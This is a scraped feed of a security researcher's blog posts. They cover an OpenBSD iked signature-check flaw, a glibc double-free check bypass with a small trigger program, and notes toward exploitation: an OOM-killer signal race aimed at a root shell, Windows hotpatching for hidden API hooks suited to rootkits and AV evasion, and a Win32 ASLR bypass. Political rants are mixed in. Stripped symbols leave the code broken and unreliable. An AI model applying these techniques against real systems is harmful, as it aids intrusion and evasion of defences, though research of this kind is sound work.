http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2011-09-01 10:57:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus : Improper API usage by iked 8 can result in silent digital signature validation Date reported 26-Aug-2011 Date patched 27-Aug-2011 background iked 8 is an Internet Key Exchange IKEv2 daemon which performs mutual authentication and which establishes and maintains IPsec flows and security associations SAs between the two peers The IKEv2 protocol is defined in RFC 5996, which combines and updates the previous standards ISAKMP Oakley RFC 2408 , IKE RFC 2409 , and the Internet DOI RFC 2407 Related vulnerabilities CVE-2008-5077, CVE-2009-0021 Description Under certain circumstances iked can be tricked to bypass a signature verification caused by the incorrect check of the EVP_VerifyFinal return value Technical details ssize_t dsa_verify_final struct iked_dsa dsa, void buf, size_t len u_int8_t sig EVP_MAX_MD_SIZE u_int siglen sizeof sig if dsa-dsa_hmac HMAC_Final dsa-dsa_ctx, sig, if siglen len memcmp buf, sig, siglen 0 return -1 else if EVP_VerifyFinal dsa-dsa_ctx, buf, len, dsa-dsa_key ca_sslerror return -1 return 0 As we review the code, we find that the dsa_verify_final function is an abstraction wrapper around two different OpenSSL API calls-- HMAC_Final and EVP_VerifyFinal depending on contextual data supplied by the functions parameters Of particular note is the call to EVP_VerifyFinal , which upon reviewing the man pages and or source code for the function we find that it actually has three types of return value with two of the three indicating some form of failure RETURN VALUES EVP_VerifyInit_ex and EVP_VerifyUpdate return 1 for success and 0 for failure EVP_VerifyFinal returns 1 for a correct signature, 0 for failure and -1 if some other error occurred A quick review of the OpenSSL source code omitted here shows that the man-page indeed accurately reflects the API and that there are potentially user-controlled code-paths that will cause -1 to be returned Furthermore, a review of the relevant code path of in iked shows that this code path is conditionally executed out of the main receive handler for the service Fix Patch information The OpenBSD team quickly provided a patch inclusive of other potential but uninvestigated exposures the day following this bugs reporting Affected parties are recommended to update iked with the patch found at http wwwopenbsdorg cgi-bin cvsweb src sbin iked cryptocdiff r1 15 r2 16 or whichever is relevant to their installation IOActive would like to thank mikeb of the OpenBSD team for his prompt and courteous interaction through the brief patching process http://www.secuobs.com/revue/news/326448.shtmlhttp://www.secuobs.com/revue/news/326448.shtml Secuobs.com : 2011-08-24 10:53:34 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - Far too often the bravest among us remain faceless and forgotten existing only officially as booking numbers and penal code violators These people did more than just retweet, repost and blog, they sacrificed at least one night of their liberty for a cause This forgetfulness on our parts is wrong and I hope to begin to rectify it All of the following were arrested during a peaceful demonstration in Washington DC My brief words could do their cause no justice and so I recommend the so inclined visit their facebook page http wwwfacebookcom eventphp eid 169961886410145 IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/324893.shtmlhttp://www.secuobs.com/revue/news/324893.shtml Secuobs.com : 2011-08-23 09:59:47 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - IMAGE IMAGE IMAGE IMAGE IMAGE Far too often the bravest among us remain faceless and forgotten existing only officially as booking numbers and penal code violators These people did more than just retweet, repost and blog, they sacrificed at least one night of their liberty for a cause This forgetfulness on our parts is wrong and I hope to begin to rectify it All of the following were arrested during peaceful demonstrations in Washington DC My brief words could do their cause no justice and so I recommend the so inclined visit their website at http wwwtarsandsactionorg IMAGE IMAGE http://www.secuobs.com/revue/news/324611.shtmlhttp://www.secuobs.com/revue/news/324611.shtml Secuobs.com : 2011-08-23 08:20:39 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - Far too often the bravest among us remain faceless and forgotten existing only officially as booking numbers and penal code violators These people did more than just retweet, repost and blog, they sacrificed at least one night of their liberty for a cause This forgetfulness on our parts is wrong and I hope to begin to rectify it All of the following were arrested during peaceful demonstrations upholding both the citizens rights to assembly speech, but also questioning the accountability of the BART police department's deployment of deadly force With this entry, I hope to begin rectifying this and giving the hero's the proper attention they deserve These men and women actually are fighting for your freedom If you feel a particular person photographed should not be listed below, state your reasons and we'll see If you're a photographed person, please contact me for removal from the pictures if that's your wish IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/324598.shtmlhttp://www.secuobs.com/revue/news/324598.shtml Secuobs.com : 2011-08-12 04:40:20 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - Although the legal and ethical definitions of right are the antithesis of each other, most writers use them as synonyms They confuse power with goodness, and mistake law for justice -Charles T Sprading, Freedom and its Fundamentals It is not what a lawyer tells me I may do but what humanity, reason, and justice tell me I ought to do -Edmund Burke, Second Speech on Conciliation, 1775 http://www.secuobs.com/revue/news/322660.shtmlhttp://www.secuobs.com/revue/news/322660.shtml Secuobs.com : 2010-09-17 01:58:31 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - Eh so, an ASLR update will come in the near future waiting on a webserver to get setup for some image hosting That all said, when I eventually get around to that post that will likely be the end of it as dm557 had a bit on making system calls at the end of his XCon talk this year, so the cat is out of the bag so to speak That all said, there are some interesting points to be made there-- specifically that randomization in several areas is more controllable than expected, which mostly just underscores the issues associated with randomization post-memory mapping or rather not having ASLR built directly into the mmap functionality Aside from that a couple random notes because I'm avoiding report writing and this is what I do after I've watched several hours of TV, ate, washed clothes, et cetera 0 I've recently had a business email setup for me that was deactivated like two years ago The amusing part to me is that the 2nd day I had the account setup I received an email from someone wanting to know about the heap paper or rather half-paper I wrote up in 2007 Then today I received an email from a bugzilla for a bug I filed over two years ago also It wasn't an important bug and the note from bugzilla was from a developer saying I don't think anyone uses this module anymore Status Open - Closed I can't complain, it was a useless bug that was filed by my pedantic doppleganger 1 An interesting post by drraid http drraidblogspotcom 2009 07 time-gcc-and-linkerhtml that I had never really considered I'm not sure what I would classify as the problem exactly the missing prototype or the missing parameter Going from memory the standards I could be totally wrong here I don't actually have them memorized say that in absence of a prototype the default prototype is like int func void , so what he's describing makes sense there and while I haven't tested it, I imagine the compiler would error out given the prototype However on the flipside, it would've worked fine in absence of the prototype had he passed a parameter I'm naturally leaning towards the 'forgot the prototype' side of things as at least it wouldn't compile in that case This has me wondering how common it is to find such code constructs I can't recall ever seeing anything like that, but the first time through his sample code I managed to miss that he wasn't passing a parameter, so I suppose I could've just missed it My first gut impression says that it would be more likely in C where default parameters are common but type-checking is also a bit more stringent, so it may not allow those situations at all My second gut impression is that it maybe happens a bit in MSFT APIs, as they like their optional output parameters but everything I can immediately think of takes more than one parameter so it seems less likely someone would forget it My third gut impression is that while interesting, this is probably not very common because it's going to require a series of mistakes None the less it represents an uncommon way for an application to die, which is always interesting Aside from that, I don't have much to say, I'm in Portland at the moment the hotel is nice, but full of roaming mobs of young teenagers, which grates my nerves a bit Okay, it's late, I've gotten maybe 50-75 lines of report written, that sounds like a productive saturday Sleep http://www.secuobs.com/revue/news/247865.shtmlhttp://www.secuobs.com/revue/news/247865.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - UPDATE no idea if this is accurate anymore, I doubt the ABI changed, but I have not once put my hands on, or operated on wtfever apples new os version is called i dont really understand why anyone does 04 November 2007 http c9c3blogspotcom 2007 11 library-randomizationhtml library randomization so it seems like to me, and perhaps im just not thinking right because i havent worked it out on paper, but it seems like because of the fact that apple say's that Mach-O position-independent code design is based on the observation that the __DATA segment is always located at a constant offset from the __TEXT segment That is, the dynamic loader, when loading any Mach-O file, never moves a file s __TEXT segment relative to its __DATA segment Therefore, a function can use its own current address plus a fixed offset to determine the location of the data it wishes to access All segments of a Mach-O file, not only the __TEXT and __DATA segments, are at fixed offsets relative to the other segments Note If you are familiar with the Executable and Linking Format ELF , you may note that Mach-O position-independent code is similar to the GOT global offset table scheme The primary difference is that Mach-O code references data using a direct offset, while ELF indirects all data access through the global offset table Now, I haven't actual spent any time digging through leopard, aside from a simple test of compiling a test program with the gcc on their v401 to see if it had SSP it had never heard of the flags -fstack-protector or -fstack-protector-all - but it seems like if Apple PIC binaries contain this trait you end up with a couple complications The first and most obvious would be that you can't randomize per section, although in theory i believe you should be able to randomize the stack and heap, although that may cause problems in one of those funko languages like obj-c The second problem is that because the text is not randomized, and because all i need to know is the base address of the image, which is pretty likely considering all of the segments that are not randomized and then look for variable references that take observation of the fact that section offsets are constant, and it would seem like I could reverse the address space layout that way I mean examining the text or anything dealing with libraries, such as dyld, should reveal a lot of those references, it seems pretty much like overkill at this point in the game because all you really need is a jmp call addr reg, but honestly this seems like a deep flaw in the ASLR logic maybe i just need more sleep http://www.secuobs.com/revue/news/213074.shtmlhttp://www.secuobs.com/revue/news/213074.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - UPDATE From Experience the type where specifics fall under NDAs , you can still find a lot of real bugs with this It provides the 1 of a 1-2 hit against MSFT, error results in uninitialized buffer which gets used in condition X the static dynamic anaylsis tools don't catch it apparently The 'Writing Secure Code' book from MSFT years ago only contained a single reference to MAX_PATH, which was in a path canonicalization function that made the mistake i reference below in the 2nd ed in the first edition, they omitted the return value checks all together While browsing another book from MSFT on secure code, it contained zero references to it The particular example in I discussed this a few years back with LeBlanc, who speaks about as well as he listens, who insisted it was a non-issue He also vehemently denied writing the code, actually IIRC his first response was 'Howard wrote it', if my memory further serves me correct I hadn't even said what code I was referring to yet That said, its been 2-3 years and it is entirely possible that I am misremembering whether I had identified what code I was speaking of Furthermore, when a co-worker of mine at the time was also off to have some experience, I said something about this causing a huge number of bugs in recent_version_os_code_review Some months later in a drunken conversation, he confirmed that i was totally right and this broke a lot of things Since then, I have found this '1-2 punch' in reviews as recent as 2009, so I have no reason to believe this is going away anytime soon That said, I know that in several very key areas the code was fixed before it ever saw the light of day although i know at least one of the products basically died and i have no idea what code was shared between similar projects I have not tried the example I give at the end of my original post since Windows Vista, but I would guess the result is probably still the same 04 November 2007 MAX_PATH and the secret life of backslash-backslash-questionmark-backslash So in Windows, specifically in the Shell API there is the concept of MAX_PATH, which obviously is the maximum path isn't it Well no, actually, it isn't If you prepend the string to a path and call the unicode version of the function, you can access files and directories with names up to something like 32,000 wide characters This can in turn lead to incorrect file access which can result in a lot of problems , or for a host of API calls that take an output buffer and output buffer size parameter, a 'buffer is too small' return value which is larger than the original output buffer size That is to say you should be calling the APIs in the following way DWORD siz len DWORD retval SomethingWithALongNameW , siz if 0 retval error if retval siz resize buffer or error But I'm seeing that in a lot of cases, thats not how people are calling it, they're instead calling it closer to this if 0 SomethingWithALongNameW , siz error When you do that, you end up with a condition where the buffer being passed in as an output isn't initialized to any value, and the return value is not properly checked and no way to truly know whether the value was initialized or not The second half of the problem comes from the fact that a lot of those same API calls will truncate MAX_PATH, potentially leading to conditions where files are accessed incorrectly, think of this in the context of signing of verifying the signature of a file where the path length that gets truncated is not the one that gets employed, or the return value is there also improperly checked Seriously, try this out- open visual studio and create a directory structure thats like C 0 1 2 3 4 5 6 , et cetera, create it longer than MAX_PATH, and then try to access it via say cmdexe or even explorerexe, try to delete it using either of those, well not cmdexe, but you'll see why there ed note to the lazy reader, everything breaks http://www.secuobs.com/revue/news/213073.shtmlhttp://www.secuobs.com/revue/news/213073.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - UPDATE briefly read chris rohlf's blog the other day and noted that new security checks have been added in the fastbin path, i cannot recall atm what they were or if this is still accurate 04 November 2007 http c9c3blogspotcom 2007 11 double-freehtml double free So, while writing an exploit for a publicly known bug at work I stumbled across another one, a double free Then I started looking into how exactly one exploit's a double free, and it looked grim The program has to survive a double free, meaning that it cannot crash The default action for glibc is to print an error message such as glibc detected double free or corruption fasttop 0x12345678 and then call abort , which terminates the program So it looked like it was not exploitable, and just a DoS, so I looked at BSD libc and the libc from Solaris, neither of them appeared to be affected by double free's either So I went back and looked in glibc's source code to determine what exactly it checks to detect a double free There are a couple different checks depending on type, I'm only covering one here because it is what pertains to my situation and the others are essentially the same with a few other easily bypassed checks So, glibc has the concept of fast bin's, or arrays where it stores free chunks of memory under certain conditions, most importantly chunks that are less than 512 bytes in length So I looked at the glibc code in malloc mallocc and find the following relevant section fb Another simple check make sure the top of the bin is not the record we are going to add ie, double free if builtin_expect fb p, 0 errstr double free or corruption fasttop goto errout Here we have something interesting, let me explain the code first though In the first line we take the variable 'fb' and make it point to the address of the element in the fast bin array for the size of the chunk in question In other words, the fast bin array is sorted by size of chunks, and we are assigning the fb variable to the address of the index for the given size of our current chunk Then we check to see if what that address points to fb is the address of the current chunk being free'd p , if so we've found the chunk being free'd in the list of free chunks and we have a double free situation or linked list corruption But what if What if another chunk of the same size and thus in the same fast bin has been deallocated since the current chunk was free'd, for instance, what if we have ptr0 malloc siz ptr1 malloc siz presume both calls succeed free ptr0 free ptr1 Then the top entry in the list won't be ptr0, it will be ptr1, and assuming no other chunks in that list have been deallocated ptr0 will be the second end on the linked list and the check will succeed and we will be able to free the pointer again, not have abort called and potentially exploit the situation for our advantage include include int main int argc, char argv void ptr0 ptr0 malloc size_t 64 if NULL ptr0 perror malloc return EXIT_FAILURE if 1 argc void ptr1 ptr1 malloc size_t 64 if NULL ptr1 perror malloc return EXIT_FAILURE free ptr0 free ptr1 free ptr0 else free ptr0 free ptr0 return EXIT_SUCCESS I've got a bit more on the glibc heap implementation, some of which I thought myself clever for finding only to realize it's been documented in a recent paper, others which just are redundant to mention at this point http://www.secuobs.com/revue/news/213072.shtmlhttp://www.secuobs.com/revue/news/213072.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - 04 November 2007 http c9c3blogspotcom 2007 11 so-im-working-on-another-program-nothtml __dso_handle __cxa_finalize So, I'm working on another program, not the one dealing with authentication and such but the one related to email with the buggy signal handler, there have been some complications in getting a reliable exploit for it so I backed up and thought maybe I could find something easier to exploit in the signal handler, I expected to perhaps be able to screw with OpenSSL in cleanup routines but there are none However, the code base is quite ugly and shows all the style of a grad student who thinks they know what they're doing and I decided to fix it to improve reliability FYI spaces bad, tabs good, putting as many things as you can on a single line bad, new lines good they come free with the computer In doing so I found another small bug that I am trying to determine if I can leverage, basically there is a static array of signed chars that I have limited control over the index, because its signed I can provide a negative index, but I only have a single char for an index so I am limited to a max of -127 bytes before the array In that, I can do nothing if where the index ends up doesn't have the value of 0x20, so I started digging through data where the compiler puts the array and seeing what has or could have a value of 0x20 -127 bytes back and I ran across a symbol named __dso_handle, not sure of what it is I dug into GCC a little bit and here's what I found Basically, it's a symbol that deals with C destructors for static objects in shared libraries, the relevant code that uses it is in a function called __cxa_finalize and is something like as follows void__cxa_finalize void d if d return for funcs __exit_funcs funcs funcs funcs-next if f-flavor ef_cxa d f-funccxadso_handle f-funccxafn f-funccxaarg the argument 'd' is the __dso_handle for the shared object, interestingly enough if I could modify that then I would have the possibility of having another objects destructors called, causing any number of circumstances, most likely a double free It's not incredibly useful in this instance because I am dealing with a program that won't have any C static object destructors, but it's interesting none the less and something I will keep in mind in the future That's that, and that was today in my world Good night http://www.secuobs.com/revue/news/213071.shtmlhttp://www.secuobs.com/revue/news/213071.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - This post has too much code that I'm simply not going through the hastle of properly formatting atm, so below is a link to the post Basically, IIRC the issue was that the solaris allocator locks a mutex whenever it does a task that modifies its internal state smart , however they wrote a wrapped to the pthread lock function that is prototyped like void xyzfunc , so any errors during the locking process where ignored Furthermore, by default the lock allowed recursive locks for the same process Meaning something like a signal could cause a re-entry into like malloc or free -- thats all from memory, a brief look at the code looks like all the function prototypes returned int, so maybe i missed including the function that masked the error, or maybe its there and i just didnt see it in my 30 second check http c9c3blogspotcom 2007 11 sololishtml http://www.secuobs.com/revue/news/213070.shtmlhttp://www.secuobs.com/revue/news/213070.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - 04 November 2007 http c9c3blogspotcom 2007 11 interesting-thought-at-leasthtml interesting thought at least Its actually pretty neat, you can potentially cause a SIGTERM to be sent to a remote process on Linux if you can cause it to consume large amounts of memory, which in turn can potentially cause a signal handler to be invoked, which can potentially happen at awkward and inopportune moments, or specifically what I'm trying to accomplish in something that I'm working on is that it has a function they call to deinitialize the entire process and deallocates globally-scoped memory Specifically it does things like tear down database connections and destroys their opaque datatypes, and other similar things along with actual calls to free So, the Linux OOM killer calls a function named badness no joke that determines every processes likelyhood of resource abuse to reclaim memory for the system, its a pretty extreme goodbye, but the OS does this when absolutely necessary to reclaim memory The badness is calculated by various factors, including its capability set specifically CAP_SYS_ADMIN and CAP_SYS_RAWIO , how long the process has been running, how many children it has and of course how much memory its consuming Finally it takes a user-tunable number, and left shifts the badness number that many times Supposedly a value of -17 in this proc file can causes the OOM killer to not consider that process if its a process leader Furthermore, processes that are in the process of free 'ing memory are not candidates So now the stage is set, I have a signal handler that calls a function that is seriously not-reentrant, but I can't reach it via traditionally applicable signals signals that can be sent remotely , ie SIGPIPE, SIGURG, et cetera It can be reached via things like SIGHUP, SIGTERM, SIGINT I can however cause a SIGTERM to be sent indirectly All I need is a memory leak, the more of them the better, I need as much precision that I can get on triggering this, if I can get it to trigger at the same time this process is already calling that exit function and I can use one of the pieces of code that more or less acts as a destructor to use a dangling pointer and write 4 bytes to say the actual destructors, when the process calls libc's exit I may be able to cause it to call an atexit function, which I hopefully control and if all of these conditions are met, I land at a root shell http://www.secuobs.com/revue/news/213069.shtmlhttp://www.secuobs.com/revue/news/213069.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - This is something I spoke to someone about today-- at some point maybe ill get around to formating it out of ctrl c ctrl v'd from my email, but i thought maybe people would find it interesting re hotpatching So I'm not exactly sure how it works yet, its another 1 2 done project of mine Like all of the MSFT binaries these days have procedure prologues example assuming using frame ptr like mov edx, edx push ebp mov ebp, esp The mov edx, edx is there so you can have a positional relative jmp backward 4 bytes to the space directly prior to the functions entry point, ie entire prologue example again assuming using frame ptr , is more accurately like this nop nop nop nop mov edx, edx push ebp So The idea is, for them to apply hotpatches they overwrite the mov edx,edx with the negative pos relative jmp, then use a full long jmp where the nop's are and thus redirect function entry to the new patched version I looked into this as I was in the process of reversing something that was pretty damn anti-reversing and I realized that even though the checksum hash their code, they couldn't do the same to MSFT provided code without potentially breaking things, so I wanted to use the hotpatching stuff to hijack monitor functions the MSFT detours stuff works on this same concept except they add new sections to the binary as trampolines or similar and I didn't feel that adding new sections would be an effective method for getting around their anti-reversing So of course I tried the first thing that crossed my mind, making ntdll writeable, modifying it and taking advantage of the fact that it wouldnt get unmapped when my process died I, of course, hit the copy-on-write semantics of windows and thats kind of as far as I got as I got distracted and had to work on something else However, the best I could tell by walking through NTDLL et cetera and thinking about how MSFT itself avoids the CoW behavior, there appears to be a system call that says 'hey hotpatch this for me', its totally undocumented and I'd have to dig around a bit to find the name of the system call again, but I can't see a reason why you couldn't start process A, make the system call or whatever and modify system DLLs that won't get unmapped k32, ntdll, winsock, et cetera , to hook functions, exit your process and now you've hooked system APIs entirely in memory with no references on disk except maybe swap , not registry LD_PRELOAD type stuff, et cetera-- and the nice part is, if you're doing anti-reversing stuff you can't ever really determine if the patched API is the result of a MSFT patch or not I think anyways-- digital signatures if present could cause a problem I suppose or someone hooking stuff In other words, once I get it figured out, not only is it a neat anti-anti-reversing technique, but thats pretty damn useful for things like rootkits, AV bypasses, et cetera http://www.secuobs.com/revue/news/213068.shtmlhttp://www.secuobs.com/revue/news/213068.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - im in the process of copying crap from old blogs, emails, twitter spam of mine, and some newer stuff from the last few days and putting them out in the public any portions of conversations reposted contain only excerpts from what i said, and i dont disclose whom i was speaking of generally, they can feel free to identify theirselves if there is a question Also, while everything here is about computers atm, i intend to use this for longer crap that i shouldnt be putting on twitter with 2321342143213 tweets That said, I'm in a bit of a rush and only one new thing is up here, although I have some interesting other stuff to post when i get off my rear and go back to the pain-staking process of copy paste remove site whatever formatting reformat html-ize post Twitter, I hate you because copying more than a few pm's at a time seems to be a major pain in the ass http://www.secuobs.com/revue/news/213067.shtmlhttp://www.secuobs.com/revue/news/213067.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - UPDATE no idea if this info is current, people have to pay me to murder my eyes by reading STL code threads and the STL Oct 16th, 2007 09 13 pm While auditing this application I noticed that there was a linked list std list that was accessed in multiple threads, however insertion and deletion of nodes in the list was serialized, however iterating over the list was not, and my little wheels got turning Here is the situation essentially in code below, i removed a bunch of layers of abstraction, but this is basically what it did thread 0 lock list_xpush_back new_node unlock thread 1 for itr list_xbegin itr list_xend itr if itr -method In thread zero, what specifically happens behind the scenes is that the push_back method first allocates a new node, then hooks the new node into the list, first by modifying the lists pointers, and then by modifying the nodes pointers at which point the new node is linked in and in a stable state In the second thread, the variable itr is assigned the first node in the list, or more specifically list_x-next In the middle condition of the for statement, the iterator is checked to ensure that it does not equal the end of the list, which behind the scenes is actually defined as being list_x the list is circular Assuming this condition is true, then the iterator is dereferenced and a member method is called However, if in the process of hooking in the new node during push_back , this new node is traversed by the for loop in the second thread, it is possible that itr-next does not point to a valid node in the list, and not to the node returned by end Thus when the iterator is assigned to itr-next, it can point to an invalid section of memory, and then when the member method is called, execution can occur in an unintended spot http://www.secuobs.com/revue/news/213066.shtmlhttp://www.secuobs.com/revue/news/213066.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - this is an old find the bug i typed up years ago I'm not sure when I first posted it, I cannot seem to find the original link in google, although I'm a little creeped out by what I did find who the hell is animalgloom At any rate, your first impulsive answer is probably not the correct one 1 include 2 include 3 include 4 include 5 6 class doh_t 7 8 public 9 LPCWSTR getter 10 11 return m_str m_str L 12 13 private 14 CComBSTR m_str 15 16 17 int 18 main void 19 20 LPCWSTR locStr 21 doh_t doh 22 23 locStr dohgetter 24 25 if NULL locStr 26 if wcscmp locStr, L 27 std cout blank stringz std endl 28 return EXIT_FAILURE 29 else XXX not reached 30 std cout dohgetter locStr std endl 31 return EXIT_SUCCESS 32 33 else 34 std cout dohgetter returned null std endl 35 return EXIT_FAILURE 36 37 XXX not reached 38 return EXIT_FAILURE 39 http://www.secuobs.com/revue/news/213065.shtmlhttp://www.secuobs.com/revue/news/213065.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - I recently came across this author, and have had serious problems locating many of his books because they're out-of-print and old, and really don't contain glitz and glam and meaningless crap, which is unamerican Anyways, I like this quote a lot and keep losing it, so im saving it here feel free to mull on its inherant truth Although the legal and ethical definitions of right are the antithesis of each other, most writers use them as synonyms They confuse power with goodness, and mistake law for justice -Charles T Sprading, Freedom and its Fundamentals Another one I liked It is not what a lawyer tells me I may do but what humanity, reason, and justice tell me I ought to do -Edmund Burke, Second Speech on Conciliation, 1775 http://www.secuobs.com/revue/news/213064.shtmlhttp://www.secuobs.com/revue/news/213064.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - Supposedly, our constitution grants us unalienable rights-- such as the right to vote, the right to own a firearm, the right to a jury trial, et cetera-- however we've managed through the years to nitpick and lawyer our way supposedly unalienable rights For instance, felons lose a bazillion rights, you cant work in all sorts of jobs, in some states you can never regain your right to vote, most you can never regain your right to own a firearm You can't be a beneficiary on a will, et cetera Sounds great when you think about muderers and violent offenders, probably dont want them to have guns again Then you realize, there is no strict definition for felony A felony could be a majijuana seed in your pocket as you passed through the Great Police State of Arizona even though we've technically decriminalized it See they found a neat loop-hole, its technically a felony even though you cannot actually ever see jail time for a first offense assuming you dont violate probation later , but the definition of a felony is that its a crime that you could goto jail for So hey, lets just write into law that its a felony, but that all courts will mark it undesignated and then we can screw X percent of the people after they finish probation by not designating the offense, leaving them as basically felons Or my favorite of the moment You have the right to a jury trial except unless the offense doesn't land you in jail for 6 months and 1 day, then its a non serious offense, except if you ask the prosecutor who will say its a serious offense, except its not, because you dont get a jury trial, yet another inalienable right I'm writing my list I'm at number 5 When I come close to Jefferson's list, I will have reached my limit This is bullshit and violates both the spirit and letter of the law furthermore laws and practices that went into effect under presidents effective order et cetera on presidents that were impeached ie LBJ should at least be reviewed The federal government does not have the right to tell you whether you can or cannot take drugs, drink bleach, or eat sand they've just decided over a hundred plus years that actually they do http://www.secuobs.com/revue/news/213063.shtmlhttp://www.secuobs.com/revue/news/213063.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - So In the city rolling-continous suburb of Scottsdale,AZ the following acts are illegal 0 Driving with muddy tires 1 Off-roading in non-dust free areas, regardless of owners consent loop-hole use electric vehicles non-combustion engine 2 On your property a Smoke b Emit 'offensive odors' farting Furthermore, you must maintain a 'sonoran desert' landscape, you have to use gravel, bark, et cetera to cover your yard If you're in an area zoned as R3 medium residential or multi-residential , which is most people you have to have three 3 tree's, they must be at least 15 gallons in size and 50pourcents of their maturity level They must be a certain distance apart and cannot have an excessive amount of gravel, bark, et cetera You cannot have weeds or uncultivated growth in your yard, front or back, and those bastards were smart enough to phrase the definition of weed as Weed means any uncultivated plant growth, including, but not limited to, bull thistle, cocklebur, foxtail, horseweed, lambs quarters, London rocket, mallow, milkweed, pigweed, mustards, prickly lettuce, ragweed, Russian thistle, tumbleweed, shepherds purse, sowthistle, white horsenettle, willow weed, and plant growth defined as noxious weeds in state statutes regardless of whether an owner or occupant regards the plant growth as desirable So, there goes my defense that I'm cultivating them on purpose, apparently being a weed farmer is illegal ironically enough being a dirt farmer isn't, but being a manure farmer is So why does this piss me off Every time it rans Scottsdale turns into a frigging death trap, north scottsdale has very few street lights, no sidewalks, nor anyways for the roads to drain when it rains Thus when it does rain, the roads flood horribly How do they deal with this They put up little signs about waist high that say 'CAUTION FLOOD' that you can't see because its fucking dark out and theres no street lights So REALLY, there's an entire division of the city devoted to weed and grass enforcement, meanwhile everytime it rains a lot lately I risk my life by driving down the road I'm glad I don't pay you fuckers taxes http://www.secuobs.com/revue/news/213062.shtmlhttp://www.secuobs.com/revue/news/213062.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - Here is a section of an email I wrote 17-Aug-2009 about something I had been playing with in my head for quite a while I cannot for the life of me bring myself to type it all up in a coherant manner, so here is an email where I mostly described what I was talking about The subject I sent the email to seemed to only get confused by what I was saying, no doubt a result of my poor phrasing incoherant english I have not re-read or proof read what I said, I just knew I could copy paste it So, I'm not sure how much you know win32 stuff, but i stumbled across something interesting that ive figured out 3 out of 4 steps, but hit a wall with the last one and figured id pick your brain and see what you thought So At 0x7ffe0300 in all versions of windows there is a pointer to the system call interface for windows, NtKiFastSystemCall IIRC Basically it 's to mov edx, esp sysenter At 0x7ffe0304 is a to the system call's ret When you make a system call, you push the arguments onto the stack along with a return address for where the kernel should resume execution in ring-3 Furthermore, eax is used to pass the system call number to be executed This holds true for all versions of windows since something like XP, and this address remains fixed despite ASLR This means that if you control eax, esp and can hit a vptr or function pointer of some sort, you know a way to make system calls It gets better though, at 0x7ffdf000 if you didnt start the application in a debugger is a pointer to a pointer to the SEH call chain start of the TEB IIRC , thus you have a pointer to the stack and quite likely yourself as having to control esp says you need a stack overflow usually Knowing this my initial plan was to return into NtProtectVirtualMemory , which takes a to the base address and just then make the stack executable and then return into the stack to execute my code The problem there is, that because of the necessity of a pointer on the stack of where to resume execute, and all I have is a bunch of pointers to pointers, however in addition to these other 's, there are also 's at 0x7f6f1cfc, 0x7f6f1d00 and 0x7f6f1d04 which exist inside of ntdll's code section and point to ret, retn 4 and retn 8 respectively So my initial plan was to push a probably bogus address onto the stack for where to return on the system call ie 0x0 , call NtProtectVirtualMemory , let the access violation trip SEH and then return into one of the retn's to take advantage of the structure passed to the SEH handler to get a pointer to the stack and execute there Of course the problem here is two-fold The first is that I don't believe I can make the stack executable again under Vista and Win7 because they have that option that makes it where changing execution permissions are forbidden Even more, SafeSEH stops me from returning into those ntdll addresses So this leaves me at a bit of a loss, I can execute at least 1 system call, I have all of the 's I should need to bootstrap myself, but I'm quickly running out of ideas I've briefly started looking at NtFreeVirtualMemory in hopes that maybe I can pass some malformed section of memory to it, but it seems unlikely to me that the kernel would be mucking about much in the section of memory its toying with I'd prefer, if at all possible to avoid a ring-3 into ring-0 attack if at all possible, but I'm not positive I have many other options left If we i someone can get this last step working, we've made a pretty significant break of win32 aslr did that all make sense any ideas Feel free to share the concept with anyone you think appropriate, http://www.secuobs.com/revue/news/213061.shtmlhttp://www.secuobs.com/revue/news/213061.shtml Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt Adventavit asinus pulcher et fortissimus - RE http wwwnytimescom 2010 03 21 world asia 21gridhtml Way to miss the point, america Look security through obscurity is great for implementations, but horrible to depend on Yes it makes it harder, but thinking no one is going to figure it out especially when you consider how many ex-DOE people there are walking and talking is just flat out stupid insecurity is, imho, best defined as the flaws that exist in any given system electronic or otherwise , regardless of whether your adversaries know about them or not There are of course times where you have to make judgement calls and say 'X can wait until date Z' or similar, but you can't simply say things like Neither the authors of this article, nor any other prior article, has had information on the identity of the power grid components represented as nodes of the network, Thus no practical scenarios of an attack on the real power grid can be derived from such work Because, well thats stupid You're either saying that China couldn't possibly have access to the 